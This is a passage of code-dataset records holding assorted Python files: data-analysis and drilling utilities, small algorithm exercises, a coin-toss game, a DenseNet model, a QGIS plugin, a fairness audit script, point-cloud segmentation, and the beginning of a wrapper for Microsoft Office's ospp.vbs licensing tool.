5000\nserver.run(port=port)","repo_name":"MarcosBB/blockchain-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37643434330","text":"import pandas as pd\nimport numpy as np\nimport warnings\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nimport os\n\nwarnings.filterwarnings('ignore')\n\n\nclass ROPData:\n def __init__(self):\n self.filepath = ''\n self.data = pd.DataFrame()\n\n def upload(self, filepath):\n self.filepath = filepath\n self.data = pd.read_csv(self.filepath)\n return self\n\n def process(self):\n data = self.data\n data['TimeStamp'] = pd.to_datetime(data['TimeStamp'])\n n = len(data)\n deltaTime = np.zeros(n) * np.nan\n forward = [True] * n\n\n # Calculate time stamp differences\n for i in range(1, n):\n deltaTime[i] = (data['TimeStamp'][i] - data['TimeStamp'][i - 1]).total_seconds()\n forward[i] = True if data['RodCount'][i] > data['RodCount'][i - 1] else False\n\n # average of 2 and 3 for 1st time point only\n deltaTime[0] = np.mean(deltaTime[1:3])\n data['ROP (ft/min)'] = (60 * 10.0 / deltaTime)\n data['deltaTime'] = deltaTime\n data = data[forward]\n # Drops rows with no time change\n data = data.replace([np.inf, -np.inf], np.nan).dropna(subset=[\"ROP (ft/min)\"], how=\"all\")\n data = data.reset_index(drop=True)\n self.data = data\n return self\n\n def filter(self, rop_greater_than=None, rop_less_than=None):\n data = self.data.loc[\n (self.data['Rotation Speed Max (rpm)'] > 0) & (self.data['Rotation Torque Max (ft-lb)'] > 0)]\n if rop_greater_than is not None:\n data = data.loc[data['ROP (ft/min)'] > rop_greater_than]\n if rop_less_than is not None:\n data = data.loc[data['ROP (ft/min)'] < rop_less_than]\n self.data = data\n return self\n\n def add_quartiles(self, num_divisions=4):\n step = 1 / num_divisions\n q = list(np.arange(step, 1, step))\n quartile_cutoffs = np.quantile(self.data['ROP (ft/min)'], q=q)\n\n def separate_quartiles(x, quartile_vec):\n # make a list of range tuples\n l = []\n for i, val in enumerate(quartile_vec):\n l.append((quartile_vec[i - 1], val))\n\n # fix the first and last tuples\n l[0] = (0, l[0][1])\n l.append((l[len(l) - 1][1], 15))\n\n # make a dictionary with the quartiles and their tuples\n d = dict((i + 1, l[i]) 
for i in range(len(l)))\n\n # look up the quartile\n for i in d:\n rng = d.get(i)\n if rng[0] <= x < rng[1]:\n quartile = i\n\n return quartile\n\n self.data['quartiles'] = self.data['ROP (ft/min)'].apply(lambda x: separate_quartiles(x, quartile_cutoffs))\n # self.data['quartiles'] = pd.qcut(self.data['ROP (ft/min)'], num_divisions,\n # labels=np.arange(start=1, stop=num_divisions + 1)[::-1],\n # duplicates='drop')\n return self\n\n def list_columns(self):\n return self.data.columns\n\n# def train_test_split(self, train_proportion):\n \n def train_model(self, model, train_proportion=0.8, features='all'):\n if features.lower() == 'all':\n data = self.data.select_dtypes([float, int]).drop(\n columns=['Latitude', 'Longitude', 'RodCount', 'deltaTime'])\n else:\n assert 'ROP (ft/min)' in features, \"Features list must contain ROP measurement.\"\n data = self.data[features].select_dtypes([float, int]).drop(\n columns=['Latitude', 'Longitude', 'RodCount', 'deltaTime'])\n\n X = data.drop(columns=['ROP (ft/min)'])\n y = data['ROP (ft/min)']\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=train_proportion, random_state=42)\n\n model.fit(X_train, y_train)\n test_predictions = model.predict(X_test)\n rmse = np.sqrt(mean_squared_error(test_predictions, y_test))\n\n return model, test_predictions, rmse\n\n def pdp_plots(self, trained_model, save_dir=None):\n data = self.data.select_dtypes([float, int]).drop(columns=['Latitude', 'Longitude', 'RodCount', 'deltaTime'])\n X = data.drop(columns=['ROP (ft/min)'])\n y = data['ROP (ft/min)']\n\n # Median Dataset Plots\n prediction_list = []\n delta_column_list = []\n for column in X.columns:\n # Create array for the variable being changed\n delta_column = np.linspace(int(min(X[column])), int(max(X[column])), 100000)\n df = pd.DataFrame(delta_column)\n # Create columns for all variables with the median values\n df['Rotation Speed Max (rpm)'] = np.median(X['Rotation Speed Max (rpm)'])\n df['Rotation Torque Max (ft-lb)'] = np.median(X['Rotation Torque Max (ft-lb)'])\n df['Thrust Force Max (lbf)'] = np.median(X['Thrust Force Max (lbf)'])\n df['Mud Flow Rate Avg (gpm)'] = np.median(X['Mud Flow Rate Avg (gpm)'])\n df['Mud Pressure Max (psi)'] = np.median(X['Mud Pressure Max (psi)'])\n df['Thrust Speed Avg (ft/min)'] = np.median(X['Thrust Speed Avg (ft/min)'])\n df['Pull Force Maximum (lbf)'] = np.median(X['Pull Force Maximum (lbf)'])\n df['Pull Speed Average (ft/min)'] = np.median(X['Pull Speed Average (ft/min)'])\n df['Drill String Length (ft)'] = np.median(X['Drill String Length (ft)'])\n # Delete the median column for the column being changed\n del df[column]\n # Rename the delta_column array to the column of interest\n df = df.rename(columns={0: column})\n # Reorder the columns to the match model requirements\n df = df[\n ['Rotation Speed Max (rpm)', 'Rotation Torque Max (ft-lb)', 'Thrust Force Max (lbf)',\n 'Mud Flow Rate Avg (gpm)',\n 'Mud Pressure Max (psi)', 'Thrust Speed Avg (ft/min)', 'Pull Force Maximum (lbf)',\n 'Pull Speed Average (ft/min)',\n 'Drill String Length (ft)']]\n\n # Predict with model and plot\n prediction = trained_model.predict(df)\n\n prediction_list.append([column, prediction])\n delta_column_list.append([column, delta_column])\n\n # Loops through all\n prediction = dict(prediction_list)\n delta_column_dict = dict(delta_column_list)\n for key in prediction:\n quartiles = np.quantile(prediction[key], q=[0.25, 0.5, 0.75])\n quartile1 = quartiles[2]\n quartile2 = quartiles[1]\n quartile3 = quartiles[0]\n\n q1_y = 
prediction[key][prediction[key] >= quartile1]\n            q2_y = prediction[key][(prediction[key] < quartile1) & (prediction[key] >= quartile2)]\n            q3_y = prediction[key][(prediction[key] < quartile2) & (prediction[key] >= quartile3)]\n            q4_y = prediction[key][(prediction[key] < quartile3) & (prediction[key] >= min(prediction[key]))]\n\n            x1 = delta_column_dict[key][(prediction[key] >= quartile1).nonzero()[0]]\n            x2 = delta_column_dict[key][((prediction[key] < quartile1) & (prediction[key] >= quartile2)).nonzero()[0]]\n            x3 = delta_column_dict[key][((prediction[key] < quartile2) & (prediction[key] >= quartile3)).nonzero()[0]]\n            x4 = delta_column_dict[key][\n                ((prediction[key] < quartile3) & (prediction[key] >= min(prediction[key]))).nonzero()[0]]\n\n            plt.figure(figsize=(10, 5))\n            plt.plot(x1, q1_y, '.', markersize=8, label='Q1')\n            plt.plot(x2, q2_y, '.', markersize=8, label='Q2')\n            plt.plot(x3, q3_y, '.', markersize=8, label='Q3')\n            plt.plot(x4, q4_y, '.', markersize=8, label='Q4')\n            plt.plot(delta_column_dict[key], prediction[key], 'k-', linewidth=0.5)\n            plt.xlabel(key)\n            plt.ylabel('ROP (ft/min)')\n            plt.title(key)\n            plt.legend()\n\n            if save_dir is not None:\n                fp = save_dir + str(key) + '.jpg'\n                if not os.path.exists(fp):\n                    plt.savefig(fp)\n\n            plt.show()\n","repo_name":"pvankatwyk/vermeer-training","sub_path":"data-engineering/rop_utils.py","file_name":"rop_utils.py","file_ext":"py","file_size_in_byte":8240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"25728730237","text":"import sys\r\ninput = sys.stdin.readline\r\nN, M = map(int, input().split())\r\ndays_money = []\r\nfor i in range(N):\r\n    days_money.append(int(input()))\r\n\r\n# Withdraw K won per withdrawal, with at most M withdrawals allowed -> find K\r\n# Minimum amount -> max of the daily spending amounts; maximum amount -> sum of all spending\r\nstart = max(days_money)\r\nend = sum(days_money)\r\nK = 0\r\nwhile start<=end :\r\n    mid = (start+end)//2\r\n    cnt = 0\r\n    left = 0\r\n    for money in days_money:\r\n        if left < money :\r\n            cnt +=1\r\n            left = mid\r\n        left -= money\r\n\r\n    if cnt > M :\r\n        start = mid + 1\r\n    else : # when cnt <= M (we can always pad up to exactly M withdrawals by re-depositing and withdrawing)\r\n        K = mid\r\n        end = mid - 1 # keep searching for a smaller K\r\n\r\nprint(K)\r\n","repo_name":"myejin/ALGO_STUDY_123","sub_path":"이분탐색/jieun/6236_용돈 관리.py","file_name":"6236_용돈 관리.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
+{"seq_id":"18438520895","text":"from random import randint, choice\n\n###########################################################################################\n# Name: Ante Zovko\n# Date: February 8th, 2020\n# Description: A game of heads and tails with two coins where Group A gets a point if \n#              the result is two heads, Group B gets a point if the result is two tails\n#              and the Prof gets a point if it is heads/tails or tails/heads\n###########################################################################################\n\n\n# The coin class\nclass Coin(object):\n\n    headsSide = \"Heads\"\n    tailsSide = \"Tails\"\n    \n    # Randomly returns heads or tails when called\n    def flip(self):\n        randomNumber = randint(0, 1)\n\n        if(randomNumber == 1):\n            return self.headsSide\n        else:\n            return self.tailsSide\n\n# Two coin objects\nfirstCoin = Coin()\nsecondCoin = Coin()\n\n# The game\n# Params: Number of games and tosses per each game\n# Returns: The result of every game as a list\ndef game(numOfGames, tossesPerGame):\n    groupA = 0\n    groupB = 0\n    prof = 0\n    allGames = []\n\n    # The outer loop keeps track of 
games\n    for i in range(numOfGames): \n        # The inner loop keeps track of tosses in each game\n        for j in range(tossesPerGame):\n            groupA, groupB, prof = coinTossTracker(groupA, groupB, prof)\n\n        # Append each result to the list\n        allGames.append(groupA)\n        allGames.append(groupB)\n        allGames.append(prof)\n        \n        # Reset scores for next game\n        groupA, groupB, prof = 0, 0, 0\n\n    return allGames\n    \n    \n# Keeps track of the score for the game\n# Params: The players' current score\n# Return: The players' current scores, with the\n#         score of the player who won incremented by 1\ndef coinTossTracker(groupA, groupB, prof):\n    # Flip each coin once so every condition sees the same toss\n    firstSide = firstCoin.flip()\n    secondSide = secondCoin.flip()\n\n    if(firstSide == \"Heads\" and secondSide == \"Heads\"):\n        return groupA + 1, groupB, prof\n\n    elif(firstSide == \"Tails\" and secondSide == \"Tails\"):\n        return groupA, groupB + 1, prof\n\n    else:\n        return groupA, groupB, prof + 1\n\n# Handles Input from the client-side\n# Params: The message for the user\ndef inputValidation(message):\n    while True:\n        try:\n            desiredVar = int(raw_input(message))\n            if(desiredVar <= 0):\n                print(\"Please enter a number bigger than 0!\\n\")\n                continue\n            else:\n                return desiredVar\n\n        except ValueError:\n            print(\"Please enter a number!\\n\")\n            continue\n\n# Creates the layout that displays the statistics\n# about the game(s)\n# Params: Number of games, tosses and the results of each game\ndef outputLayout(numOfGames, numOfTosses, allGames):\n\n    # Keeps track of total wins\n    groupAWins = 0\n    groupBWins = 0\n    profWins = 0\n    \n    # Casts to float for division\n    numOfTosses = float(numOfTosses)\n    flNumOfGames = float(numOfGames)\n\n    # Displays each game and its statistics\n    for i in range(numOfGames):\n        print(\"Game {}\\n Group A: {} ({}%); Group B: {} ({}%); Prof: {} ({}%);\".format(i, allGames[i*3], round((allGames[i*3]/numOfTosses)*100, 2),allGames[(i*3)+1], \n        round((allGames[(i*3)+1]/numOfTosses)*100, 2),allGames[(i*3)+2], round((allGames[(i*3)+2]/numOfTosses)*100, 2)))\n        \n        # Creates a list with the three current scores\n        wins = [allGames[i*3], allGames[(i*3)+1], allGames[(i*3)+2]]\n        \n        # Checks if there are duplicates by counting how many maxes there are\n        if(wins.count(max(wins)) > 1):\n            # Gets the duplicates positions in the list\n            maxPositions = list_duplicates_of(wins, max(wins))\n            # Picks a random winner\n            winner = choice(maxPositions)\n        else:\n            # Winner is the player with the highest score\n            winner = wins.index(max(wins))\n\n        # Increments total wins for the\n        # corresponding player\n        if(winner == 0):\n            groupAWins += 1\n        elif(winner == 1):\n            groupBWins += 1\n        elif(winner == 2):\n            profWins += 1\n\n    # Displays the total statistics\n    print(\"Wins: Group A: {} ({}%); Group B: {} ({}%); Prof: {} ({}%)\".format(groupAWins, round((groupAWins/flNumOfGames)*100, 2), groupBWins, round((groupBWins/flNumOfGames)*100, 2),\n    profWins, round((profWins/flNumOfGames)*100, 2)))\n\n\n# Finds the positions of duplicates in a list\n# Params: list, item to find\n# Returns: List of duplicate positions\n# Found on: https://stackoverflow.com/questions/5419204/index-of-duplicates-items-in-a-python-list\ndef list_duplicates_of(seq,item):\n    start_at = -1\n    locs = []\n    while True:\n        try:\n            loc = seq.index(item,start_at+1)\n        except ValueError:\n            break\n        else:\n            locs.append(loc)\n            start_at = loc\n    return locs\n\n# Main\nnumOfGames = inputValidation(\"How many games? \")\nnumOfTosses = inputValidation(\"How many coin tosses per game? 
\")\n\noutputLayout(numOfGames, numOfTosses, game(numOfGames, numOfTosses))\n\n","repo_name":"AnteZovko23/University-Assignments-and-Projects","sub_path":"Python/CS 131-The Science of Computing II/Assignments/FoolProofGame.py","file_name":"FoolProofGame.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"71473059130","text":"import tensorflow as tf\nimport numpy as np\n\ndef conv_layer(input, filter, kernel, stride=1, layer_name='conv'):\n with tf.name_scope(layer_name):\n net = tf.layers.conv2d(inputs=input,\n use_bias=False,\n filters=filter,\n kernel_size=kernel,\n strides=stride,\n padding='SAME')\n return net\n\ndef Global_average_pooling(x, stride=1):\n width = np.shape(x)[1]\n height = np.shape(x)[2]\n pool_size = [width, height]\n return tf.layers.average_pooling2d(inputs=x, pool_size=pool_size, strides=stride) # The stride value does not matter\n\ndef Batch_norm(x, training, scope):\n return tf.cond(\n training,\n lambda : tf.layers.batch_normalization(\n inputs=x,\n trainable=True,\n reuse=None,\n name=scope),\n lambda : tf.layers.batch_normalization(\n inputs=x,\n trainable=False,\n reuse=True,\n name=scope)\n )\n\ndef Drop_out(x, rate, training):\n return tf.layers.dropout(inputs=x, rate=rate, training=training)\n\ndef Relu(x):\n return tf.nn.relu(x)\n\ndef Average_pooling(x, pool_size=[2, 2], stride=2, padding='VALID'):\n return tf.layers.average_pooling2d(inputs=x, pool_size=pool_size, strides=stride, padding=padding)\n\ndef Max_pooling(x, pool_size=[3, 3], stride=2, padding='VALID'):\n return tf.layers.max_pooling2d(inputs=x, pool_size=pool_size, strides=stride, padding=padding)\n\ndef Concatenation(layers):\n return tf.concat(layers, axis=3)\n\nclass DenseNet():\n def __init__(self, x, nb_blocks, filters, training, dropout_rate):\n self.nb_blocks = nb_blocks\n self.filters = filters\n self.training = training\n self.dropout_rate = dropout_rate\n self.logits = self.densenet(x)\n\n def bottle_neck_layer(self, x, scope):\n with tf.name_scope(scope):\n x = Batch_norm(x, training=self.training, scope='%s_batch1' % scope)\n x = Relu(x)\n x = conv_layer(x, filter=4 * self.filters, kernel=[1, 1], layer_name= '%s_conv1' % scope)\n x = Drop_out(x, rate=self.dropout_rate, training=self.training)\n\n x = Batch_norm(x, training=self.training, scope='%s_batch2' % scope)\n x = Relu(x)\n x = conv_layer(x, filter=self.filters, kernel=[3, 3], layer_name='%s_batch2' % scope)\n x = Drop_out(x, rate=self.dropout_rate, training=self.training)\n\n return x\n\n def transition_layer(self, x, scope):\n with tf.name_scope(scope):\n x = Batch_norm(x, training=self.training, scope='%s_batch1' % scope)\n x = Relu(x)\n x = conv_layer(x, filter=self.filters, kernel=[1, 1], layer_name='%s_conv1' % scope)\n x = Drop_out(x, rate=self.dropout_rate, training=self.training)\n x = Average_pooling(x, pool_size=[2, 1], stride=1)\n return x\n\n def dense_block(self, input_x, nb_layers, layer_name):\n with tf.name_scope(layer_name):\n layer_concat = list()\n layer_concat.append(input_x)\n\n x = self.bottle_neck_layer(input_x, scope='%s_bottleN_%d' % (layer_name, 0))\n\n layer_concat.append(x)\n\n for i in range(nb_layers - 1):\n x = Concatenation(layer_concat)\n x = self.bottle_neck_layer(x, scope='%s_bottleN_%d' % (layer_name, i + 1))\n layer_concat.append(x)\n\n x = Concatenation(layer_concat)\n return x\n\n def densenet(self, input_x):\n x = conv_layer(input_x, filter= 2 * self.filters, kernel=[5, 5], stride=2, 
layer_name='conv0')\n        x = self.dense_block(input_x=x, nb_layers=3, layer_name='dense_1')\n        x = self.transition_layer(x, scope='trans_1')\n\n        x = self.dense_block(input_x=x, nb_layers=6, layer_name='dense_2')\n        x = self.transition_layer(x, scope='trans_2')\n\n        x = self.dense_block(input_x=x, nb_layers=3, layer_name='dense_3')\n        x = Batch_norm(x, training=self.training, scope='linear_batch')\n        x = Relu(x)\n        x = Global_average_pooling(x)\n        return x","repo_name":"jiapengzhu5/RDense","sub_path":"RDense/Densenet.py","file_name":"Densenet.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
+{"seq_id":"29665211746","text":"__author__ = 'Lydia Letaru & Rufai Balogun'\n__date__ = '2021-09-04'\n__copyright__ = '(C) 2021 by Lydia Letaru & Rufai Balogun'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nimport sys\nimport inspect\n\nfrom qgis.core import QgsProcessingAlgorithm, QgsApplication\nfrom .LandscapeMetrics_provider import LandscapeMetricsProvider\n\ncmd_folder = os.path.split(inspect.getfile(inspect.currentframe()))[0]\n\nif cmd_folder not in sys.path:\n    sys.path.insert(0, cmd_folder)\n\n\nclass LandscapeMetricsPlugin(object):\n\n    def __init__(self):\n        self.provider = None\n\n    def initProcessing(self):\n        \"\"\"Init Processing provider for QGIS >= 3.8.\"\"\"\n        self.provider = LandscapeMetricsProvider()\n        QgsApplication.processingRegistry().addProvider(self.provider)\n\n    def initGui(self):\n        self.initProcessing()\n\n    def unload(self):\n        QgsApplication.processingRegistry().removeProvider(self.provider)\n","repo_name":"Ruphai/GIS_Application_Development","sub_path":"landscapemetrics/LandscapeMetrics.py","file_name":"LandscapeMetrics.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"41377224319","text":"#Bias & Fairness\n### Load the model and prepare the aequitas table\nimport numpy as np\nimport pickle\nimport pandas as pd\nfrom Class_Eda import Eda\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nimport aequitas\nimport seaborn as sns\nfrom aequitas.group import Group\nfrom aequitas.bias import Bias\nfrom aequitas.fairness import Fairness\nfrom aequitas.plotting import Plot\nfrom aequitas.preprocessing import preprocess_input_df\n\n#Instantiate the Eda object\nobjEda = Eda()\n#Initialize the main parameters (for now, only one: the data source path)\nobjEda.strRutaDataSource='Transit_modeling.csv' #The file produced by feature engineering\n#Loading step\nobjEda.Cargar_Datos()\n#Cleaning step\nobjEda.Limpiar_Datos()\n#Store the array in the new column\nobjEda.pdDataSet['y'] = objEda.pdDataSet.apply(lambda x: (x.etiqueta1), axis=1)\n\n################## Separate the features from what we want to predict\npdX, pdY = objEda.SepararFeaturesYPred('y')\n\n################## Split our data into training and test sets using an 80-20 ratio\nobjEda.Generar_Train_Test(pdX, pdY, 0.2)\n\n################## Prepare the variables we will impute\nobjEda.listTransform=[''] #Clear the list property of features to impute\nobjEda.Agregar_Features_Transform('median', 'vuelos_afectados') #did nothing because they are stored as NaN\n\n################## Impute over the training and test sets\nobjEda.X_train = 
objEda.Imputar_Features(objEda.X_train)\nobjEda.X_test = objEda.Imputar_Features(objEda.X_test)\n\n#Convert the numpy array to a dataframe\nX_test_df = pd.DataFrame(objEda.X_test)\n\n#Keep only the day of the week\nX_test_df = X_test_df[2]\n\n#Rename the columns for Aequitas\nlabels_train_df = ['day_sem']\nlabels_test_df = labels_train_df\n\nX_test_df = pd.DataFrame(X_test_df) #Convert the numpy array into a Pandas dataframe\nX_test_df.columns=labels_train_df\n\n#Import the model\npickleName = 'ModeloFinalRita.p'\npickleFile = open(pickleName, 'rb')\nmodel = pickle.load(pickleFile)\npickleFile.close()\nmodel\n\n# Also import the test sets used for Rita\n\npickleName = 'X_testRita.p'\npickleFile = open(pickleName, 'rb')\nX_test = pickle.load(pickleFile)\npickleFile.close()\n\npickleName = 'Y_testRita.p'\npickleFile = open(pickleName, 'rb')\nY_test = pickle.load(pickleFile)\npickleFile.close()\n\n#Fit the model\nmodel.fit(X_train, Y_train)\n\n#Function that performs the predictions\npredict_model=lambda x: model.predict_proba(x).astype(float)\n\n#predict_fn_model = lambda x: model.predict_proba(x).astype(float)\npredict_model\n\n#Rename the columns for Aequitas\nlabels_train = ['count','max','nvue_falt','vuelos_afectados','lunes','martes','miercoles','jueves','viernes','sabado','domingo']\nlabels_test = labels_train\n\nX_test = pd.DataFrame(X_test) #Convert the numpy array into a Pandas dataframe\nX_test.columns=labels_train\nX_test.head()\n\n#Rename the variables according to the input data structure\npredicciones=pd.DataFrame(model.predict(X_test))\npredicciones=predicciones.rename(columns={0: \"score\"})\n\n#Changes to Y_test\n#y_test=pd.DataFrame(Y_test)\ny_test=Y_test.rename(columns={\"y\": \"label_value\"})\ny_test.reset_index(drop=True, inplace=True)\ny_test.shape\n\n#Join the dataframes to build the input data\ndatos_aequitas=pd.concat([predicciones,y_test,X_test,X_test_df], axis=1)\n#Data preparation for aequitas ends here ------------------------------------------------------------\n\n#Filter the aequitas data to compute FNR\ndatos_aequitas = datos_aequitas[['score','label_value','day_sem']]\ndatos_aequitas.head()\n\n#Aequitas installation\n#pip install aequitas\n\ng = Group()\nxtab, _ = g.get_crosstabs(datos_aequitas)\n#xtab contains calculations of all the FP, FN, TP, TN metrics\n\n#Bias calculation\nb = Bias()\nbdf = b.get_disparity_predefined_groups(xtab,\n                                        original_df=datos_aequitas,\n                                        ref_groups_dict={'day_sem':'e:viernes'},\n                                        alpha=0.05,\n                                        check_significance=False)\n\n\n#Fairness calculation\nf = Fairness()\nfdf = f.get_group_value_fairness(bdf) #Same reference group\n\n#Export files\nruta = \"bdf.csv\"\nbdf.to_csv(ruta)\n\nruta = \"fdf.csv\"\nfdf.to_csv(ruta)\n","repo_name":"Millan13/dpa_equipo2","sub_path":"Scripts/Bias_Fairness.py","file_name":"Bias_Fairness.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"}
+{"seq_id":"31167001017","text":"#3D point cloud segmentation based on normals and distances\n\nimport cv2\nimport numpy as np\nimport open3d as o3d\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport matplotlib.pyplot as plt\n\nfrom open3d import *\ndef get_vector_angle(u,v):\n    #print(u,v)\n    uv=np.dot(u,v)\n    #mu=np.linalg.norm(u)\n    #mv=np.linalg.norm(v)\n    ang = np.arccos(uv)\n    ang = ang*180/np.pi\n    if (ang > 90):\n        ang = 180 - ang\n    return (ang)\ndef get_plane_distance(n,p):\n    d=np.dot(n,p)\n    
return (d)\n\ndef get_distance_group(dist,group1,distance_resolution):\n    group={}\n    group_center={}\n    group[0]=[group1[0]]\n    group_center[0]=dist[0]\n    u=dist[0]\n    \n    for i in np.arange(1,len(group1)):\n        v=dist[i]\n        for y in group_center: #Add the new member in the matching group\n            u=group_center[y]\n            if abs(u-v) <=distance_resolution:\n                group[y] +=[group1[i]]\n                break\n        else: #Create a new group center\n            new_group=len(group_center)\n            group_center[new_group]=v\n            group[new_group]=[group1[i]]\n    return (group, group_center)\n    \n\nif __name__ == \"__main__\":\n    angle_resolution=10\n    distance_resolution=0.05\n    thresold=150\n    print(\"Load a ply point cloud and render it\")\n    #pcd = o3d.io.read_point_cloud(\"c:/ply/test.ply\")\n    \n    #pcd = o3d.io.read_point_cloud(\"../../TestData/fragment.ply\")\n\n    color_raw = read_image(\"C:/Users/DELL/Python37/Rachna/data/rgb_2.jpg\")\n    depth_raw = read_image(\"C:/Users/DELL/Python37/Rachna/data/depth_2.png\")\n    #color_raw = read_image(\"C:/Users/DELL/Python37/Open3D-master/examples/TestData/RGBD/other_formats/TUM_color.png\")\n    #depth_raw = read_image(\"C:/Users/DELL/Python37/Open3D-master/examples/TestData/RGBD/other_formats/TUM_depth.png\")\n    \n    rgbd_image = o3d.create_rgbd_image_from_tum_format(color_raw, depth_raw)\n    \n    \n    pcd = o3d.create_point_cloud_from_rgbd_image(rgbd_image, o3d.PinholeCameraIntrinsic(\n        o3d.PinholeCameraIntrinsicParameters.PrimeSenseDefault))\n    #Flip it, otherwise the pointcloud will be upside down\n    pcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n    \n    #o3d.io.write_point_cloud(\"C:/Users/DELL/Python37/Rachna/rgb_3.pcd\", pcd)\n    #o3d.io.write_point_cloud(\"C:/Users/DELL/Python37/Rachna/test.ply\", pcd)\n    if not pcd.has_points():\n        print(\"Unable to properly load point cloud. 
check the file name and location\")\n exit()\n print(pcd)\n o3d.visualization.draw_geometries([pcd])\n downpcd = o3d.geometry.voxel_down_sample(pcd, voxel_size=0.005)\n cl, ind = o3d.geometry.statistical_outlier_removal(downpcd,nb_neighbors=20, std_ratio=2.0)\n \n downpcd = o3d.geometry.select_down_sample(downpcd, ind)\n o3d.geometry.estimate_normals(downpcd,search_param=o3d.geometry.KDTreeSearchParamHybrid(\n radius=0.1, max_nn=30))\n #o3d.visualization.draw_geometries([downpcd])\n \n #print(downpcd)\n \n #downpcd=pcd\n #o3d.visualization.draw_geometries([downpcd])\n\n normals= np.asarray(downpcd.normals)\n group={}\n group_center={}\n group[0]=[0]\n group_center[0]=normals[0]\n u=normals[0]\n for i in np.arange(1,len(normals)):\n v=normals[i]\n for y in group_center: #Add the new member in the matching group\n u=group_center[y]\n if get_vector_angle(u,v) <=angle_resolution:\n group[y] +=[i]\n break\n else: #Create a new group center\n new_group=len(group_center)\n group_center[new_group]=v\n group[new_group]=[i]\n\n\n\n planes={}\n no_of_planes=0\n for i in group_center: \n n=group_center[i]\n dist=[]\n for idx in group[i]:\n p= downpcd.points[idx]\n dist+=[get_plane_distance(n,p)]\n## plt.plot(np.sort(dist))\n## plt.show()\n a,b=get_distance_group(dist,group[i],distance_resolution)\n planes[i]=[a]\n no_of_planes+=len(b)\n\n jet=plt.get_cmap('jet')\n cNorm = colors.Normalize(vmin=0,vmax=10*no_of_planes)\n scalarMap=cmx.ScalarMappable(norm=cNorm,cmap=jet)\n\n current_plane_no=0\n no_large_planes=0\n for i in planes:\n p=planes[i]\n for idx in p[0]:\n a=p[0][idx]\n if len(a) bool:\n mag_hash = {}\n ran_hash = {}\n\n for c in magazine:\n if c in mag_hash:\n mag_hash[c] += 1\n else:\n mag_hash[c] = 1\n\n for c in ransomNote:\n if c in ran_hash:\n ran_hash[c] += 1\n else:\n ran_hash[c] = 1\n\n for c in ran_hash:\n if c not in mag_hash or mag_hash[c] < ran_hash[c]:\n return False\n\n return True","repo_name":"mac718/dsa","sub_path":"LeetCode/ransom_note.py","file_name":"ransom_note.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73486766969","text":"import argparse\nimport subprocess\nimport os\nimport re\nimport requests\nfrom configparser import ConfigParser\nimport traceback\n\nclass OSPPModule:\n def __init__(self):\n self.ospp_commands = {\n # Global Options\n \"activate_office_product\": \"/act\",\n \"install_product_key\": \"/inpkey:value\",\n \"uninstall_product_key\": \"/unpkey:value\",\n \"install_license\": \"/inslic:value\",\n \"display_license_info\": \"/dstatus\",\n \"display_all_license_info\": \"/dstatusall\",\n \"display_activation_failure_history\": \"/dhistoryacterr\",\n \"display_installation_id\": \"/dinstid\",\n \"activate_with_confirmation_id\": \"/actcid:value\",\n \"reset_licensing_status\": \"/rearm\",\n \"reset_license_status_with_skuid\": \"/rearm:value\",\n \"display_error_description\": \"/ddescr:value\",\n\n # KMS Client Options\n \"display_kms_activation_history\": \"/dhistorykms\",\n \"display_kms_client_machine_id\": \"/dcmid\",\n \"set_kms_host_name\": \"/sethst:value\",\n \"set_kms_port\": \"/setprt:value\",\n \"remove_kms_host_name\": \"/remhst\",\n \"permit_or_deny_kms_host_caching\": \"/cachst:value\",\n \"set_volume_activation_type\": \"/actype:value\",\n \"set_kms_srv_records_domain\": \"/skms-domain:value\",\n \"clear_kms_srv_records_domain\": \"/ckms-domain\",\n\n # Token Options\n \"display_installed_token_activation_issuance_licenses\": 
\"/dtokils\",\n \"uninstall_installed_token_activation_issuance_license\": \"/rtokil:value\",\n \"set_token_based_activation_flag\": \"/stokflag\",\n \"clear_token_based_activation_flag\": \"/ctokflag\",\n \"display_token_based_activation_certificates\": \"/dtokcerts\",\n \"token_activate\": \"/tokact:value1:value2\",\n }\n\n def find_ospp(self):\n # Define the list of Office versions (4, 5, and 6 in this case)\n office_versions = [4, 5, 6]\n\n for version in office_versions:\n # Check if the ospp.vbs file exists in the 32-bit Program Files directory\n program_files_path = os.environ.get(\"ProgramFiles\")\n ospp_vbs_path = os.path.join(program_files_path, f\"Microsoft Office\\\\Office1{version}\\\\ospp.vbs\")\n\n if os.path.exists(ospp_vbs_path):\n return ospp_vbs_path\n\n # Check if the ospp.vbs file exists in the 64-bit Program Files directory\n program_files_x86_path = os.environ.get(\"ProgramFiles(x86)\")\n ospp_vbs_path_x86 = os.path.join(program_files_x86_path, f\"Microsoft Office\\\\Office1{version}\\\\ospp.vbs\")\n\n if os.path.exists(ospp_vbs_path_x86):\n return ospp_vbs_path_x86\n\n return None\n\n def execute_ospp_command(self, command):\n ospp_path = self.find_ospp()\n if not ospp_path:\n raise FileNotFoundError(\"--- ERROR --- \\n -Errmsg: ospp.vbs not found. Please check the path.\")\n\n try:\n ospp_command = [\"cscript\", ospp_path, command]\n result = subprocess.run(ospp_command, capture_output=True, text=True)\n return 